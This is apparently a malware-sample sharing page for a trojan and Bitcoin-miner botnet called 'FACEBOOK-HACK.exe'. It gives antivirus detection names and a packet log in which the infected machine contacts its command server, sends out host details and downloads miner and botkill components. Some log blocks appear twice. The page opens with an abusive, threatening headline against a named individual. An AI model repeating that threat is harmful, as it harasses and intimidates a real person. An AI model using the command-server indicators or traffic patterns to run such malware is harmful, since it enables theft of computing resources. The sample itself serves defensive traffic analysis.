Text Example

LAWRENCE KNACHEL IS A TROGLYODYTE PIECE OF SH!T - 3600 VISITORS DAILY WILL KNOW YOUR DAY IS COMING SOON

FACEBOOK-HACK.exe Zusy Malware Trojan Bitcoin Cryptocurrency Miner Botnet PCAP File Download Traffic Sample

Download Attachments

  • 1 pcap httpbuilder
    Date added: May 9, 2017 1:47 am Added by: admin File size: 92 KB Downloads: 60
SHA256: b70dea97af65d741ef77006df77ff0c1ed4acb2dc592885195840c07878a9b1b
File name: FACEBOOK-HACK.exe
Detection ratio: 44 / 61
Analysis date: 2017-05-09 01:30:10 UTC ( 0 minutes ago )
Ad-Aware Gen:Variant.Zusy.2105 20170509
AegisLab Troj.W32.Generic!c 20170509
ALYac Gen:Variant.Zusy.2105 20170509
Arcabit Trojan.Zusy.D839 20170509
Avast Win32:Malware-gen 20170509
AVG MSIL11.AXSK 20170509
Avira (no cloud) BDS/Backdoor.Gen 20170509
AVware Trojan.Win32.Generic!BT 20170508
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9999 20170503
BitDefender Gen:Variant.Zusy.2105 20170509
CAT-QuickHeal Trojan.Megalodon.A3 20170508
ClamAV Win.Packed.Confuser-6042561-0 20170508
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20170130
DrWeb Trojan.DownLoader24.55659 20170508
Emsisoft Gen:Variant.Zusy.2105 (B) 20170508
Endgame malicious (high confidence) 20170503
ESET-NOD32 a variant of MSIL/Agent.QUI 20170509
F-Secure Gen:Variant.Zusy.2105 20170508

2017-05-08 19:32:07.136203 IP 192.168.1.102.54461 > 178.32.102.34.80: Flags [P.], seq 0:412, ack 1, win 256, length 412: HTTP: GET /d/FACEBOOK-HACK.exe HTTP/1.1
E…\
@……..f. f”…P….sA 8P…”…GET /d/FACEBOOK-HACK.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: zunzail.livehost.fr
Connection: Keep-Alive

 

2017-05-08 19:32:15.600677 IP 192.168.1.102.64438 > 75.75.75.75.53: 23273+ A? zunzail.livehost.fr. (37)
E..A$7………fKKKK…5.-./Z…………zunzail.livehost.fr…..
2017-05-08 19:32:15.776645 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [S], seq 3848081592, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4\.@….`…f. f”…P.]…….. ……………..
2017-05-08 19:32:15.886198 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 3015686387, win 256, length 0
E..(\.@….k…f. f”…P.]……P………….
2017-05-08 19:32:15.887357 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [P.], seq 0:73, ack 1, win 256, length 73: HTTP: GET /LB5/ HTTP/1.1
E..q\.@….!…f. f”…P.]……P…….GET /LB5/ HTTP/1.1
Host: zunzail.livehost.fr
Connection: Keep-Alive

2017-05-08 19:32:16.036363 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 2921, win 256, length 0
E..(\.@….i…f. f”…P.]…..[P………….
2017-05-08 19:32:16.037348 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 5841, win 256, length 0
E..(\.@….h…f. f”…P.]……P………….
2017-05-08 19:32:16.038033 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 8761, win 256, length 0
E..(\.@….g…f. f”…P.]…..+P…z)……..
2017-05-08 19:32:16.038456 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 9772, win 252, length 0
E..(\.@….f…f. f”…P.]……P…v:……..
2017-05-08 19:32:16.095815 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [P.], seq 73:131, ack 9772, win 252, length 58: HTTP: GET /LB5/login.php HTTP/1.1
E..b\.@….+…f. f”…P.]……P…….GET /LB5/login.php HTTP/1.1
Host: zunzail.livehost.fr

 

2017-05-08 19:32:16.095815 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [P.], seq 73:131, ack 9772, win 252, length 58: HTTP: GET /LB5/login.php HTTP/1.1
E..b\.@….+…f. f”…P.]……P…….GET /LB5/login.php HTTP/1.1
Host: zunzail.livehost.fr

2017-05-08 19:32:16.236113 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 11378, win 256, length 0
E..(\.@….d…f. f”…P.].<…dP…o………
2017-05-08 19:32:16.286007 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 11383, win 256, length 0
E..(\.@….c…f. f”…P.].<…iP…o………
2017-05-08 19:32:16.778606 IP 192.168.1.102.64439 > 75.75.75.75.53: 17557+ A? checkip.amazonaws.com. (39)
E..C$8………fKKKK…5./..D…………checkip        amazonaws.com…..
2017-05-08 19:32:16.806707 IP 192.168.1.102.54463 > 50.19.97.123.80: Flags [S], seq 521546646, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4\r@…H….f2.a{…P..+……. ……………..
2017-05-08 19:32:16.847368 IP 192.168.1.102.54463 > 50.19.97.123.80: Flags [.], ack 3773245444, win 64240, length 0
E..(\s@…H….f2.a{…P..+…(.P…6………
2017-05-08 19:32:16.847976 IP 192.168.1.102.54463 > 50.19.97.123.80: Flags [P.], seq 0:71, ack 1, win 64240, length 71: HTTP: GET / HTTP/1.1
E..o\t@…Hx…f2.a{…P..+…(.P…….GET / HTTP/1.1
Host: checkip.amazonaws.com
Connection: Keep-Alive

2017-05-08 19:32:16.887624 IP 192.168.1.102.54463 > 50.19.97.123.80: Flags [.], ack 138, win 64103, length 0
E..(\u@…H….f2.a{…P..+…(.P..g6W……..
2017-05-08 19:32:16.890334 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [P.], seq 131:403, ack 11383, win 256, length 272: HTTP: GET /LB5/bot/check.php?hwid=0FABFBFF0001067A&ip=76.111.8.85&os=Microsoft%20Windows%207%20Starter%20&name=WIN-F7076KTQ1P5&ram=1&cpu=Intel(R)%20Core(TM)2%20Quad%20CPU%20%20%20%20Q8300%20%20@%202.50GHz&gpu=VMware%20SVGA%203D&av=Unknown HTTP/1.1
E..8\.@….R…f. f”…P.].<…iP…    …GET /LB5/bot/check.php?hwid=0FABFBFF0001067A&ip=76.111.8.85&os=Microsoft%20Windows%207%20Starter%20&name=WIN-F7076KTQ1P5&ram=1&cpu=Intel(R)%20Core(TM)2%20Quad%20CPU%20%20%20%20Q8300%20%20@%202.50GHz&gpu=VMware%20SVGA%203D&av=Unknown HTTP/1.1
Host: zunzail.livehost.fr

2017-05-08 19:32:17.082854 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 11784, win 255, length 0
E..(\.@….a…f. f”…P.].L….P…m………
2017-05-08 19:32:17.085557 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [P.], seq 403:473, ack 11784, win 255, length 70: HTTP: GET /LB5/bot/miner.php?check=1 HTTP/1.1
E..n\.@……..f. f”…P.].L….P….J..GET /LB5/bot/miner.php?check=1 HTTP/1.1
Host: zunzail.livehost.fr

2017-05-08 19:32:16.847976 IP 192.168.1.102.54463 > 50.19.97.123.80: Flags [P.], seq 0:71, ack 1, win 64240, length 71: HTTP: GET / HTTP/1.1
E..o\t@…Hx…f2.a{…P..+…(.P…….GET / HTTP/1.1
Host: checkip.amazonaws.com
Connection: Keep-Alive

2017-05-08 19:32:16.887624 IP 192.168.1.102.54463 > 50.19.97.123.80: Flags [.], ack 138, win 64103, length 0
E..(\u@…H….f2.a{…P..+…(.P..g6W……..
2017-05-08 19:32:16.890334 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [P.], seq 131:403, ack 11383, win 256, length 272: HTTP: GET /LB5/bot/check.php?hwid=0FABFBFF0001067A&ip=76.111.8.85&os=Microsoft%20Windows%207%20Starter%20&name=WIN-F7076KTQ1P5&ram=1&cpu=Intel(R)%20Core(TM)2%20Quad%20CPU%20%20%20%20Q8300%20%20@%202.50GHz&gpu=VMware%20SVGA%203D&av=Unknown HTTP/1.1
E..8\.@….R…f. f”…P.].<…iP…    …GET /LB5/bot/check.php?hwid=0FABFBFF0001067A&ip=76.111.8.85&os=Microsoft%20Windows%207%20Starter%20&name=WIN-F7076KTQ1P5&ram=1&cpu=Intel(R)%20Core(TM)2%20Quad%20CPU%20%20%20%20Q8300%20%20@%202.50GHz&gpu=VMware%20SVGA%203D&av=Unknown HTTP/1.1
Host: zunzail.livehost.fr

2017-05-08 19:32:17.082854 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 11784, win 255, length 0
E..(\.@….a…f. f”…P.].L….P…m………
2017-05-08 19:32:17.085557 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [P.], seq 403:473, ack 11784, win 255, length 70: HTTP: GET /LB5/bot/miner.php?check=1 HTTP/1.1
E..n\.@……..f. f”…P.].L….P….J..GET /LB5/bot/miner.php?check=1 HTTP/1.1
Host: zunzail.livehost.fr

2017-05-08 19:32:17.159157 IP 192.168.1.102.54464 > 178.32.102.34.80: Flags [S], seq 2327510108, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4\.@….S…f. f”…P…\…… ……………..
2017-05-08 19:32:17.233629 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 12191, win 253, length 0
E..(\ @….^…f. f”…P.]……P…k6……..
2017-05-08 19:32:17.234583 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [P.], seq 473:535, ack 12191, win 253, length 62: HTTP: GET /LB5/bot/miner.php HTTP/1.1
E..f\!@……..f. f”…P.]……P…9…GET /LB5/bot/miner.php HTTP/1.1
Host: zunzail.livehost.fr

2017-05-08 19:32:17.269497 IP 192.168.1.102.54464 > 178.32.102.34.80: Flags [.], ack 4094637492, win 256, length 0
E..(\”@….\…f. f”…P…]..5.P…N………
2017-05-08 19:32:17.270126 IP 192.168.1.102.54464 > 178.32.102.34.80: Flags [P.], seq 0:68, ack 1, win 256, length 68: HTTP: GET /LB5/out/bin/botkill.bin HTTP/1.1
E..l\#@……..f. f”…P…]..5.P…….GET /LB5/out/bin/botkill.bin HTTP/1.1
Host: zunzail.livehost.fr

2017-05-08 19:32:17.315772 IP 192.168.1.102.54461 > 178.32.102.34.80: Flags [F.], seq 412, ack 15623, win 252, length 0
E..(\$@….Z…f. f”…P….sA]>P………….
2017-05-08 19:32:17.376690 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [.], ack 12653, win 251, length 0
E..(\%@….Y…f. f”…P.]….._P…i,……..
2017-05-08 19:32:17.442867 IP 192.168.1.102.54462 > 178.32.102.34.80: Flags [P.], seq 535:616, ack 12653, win 251, length 81: HTTP: GET /LB5/bot/do.php?hwid=0FABFBFF0001067A HTTP/1.1
E..y\&@……..f. f”…P.]….._P….I..GET /LB5/bot/do.php?hwid=0FABFBFF0001067A HTTP/1.1
Host: zunzail.livehost.fr

 

 

 

Leave a Reply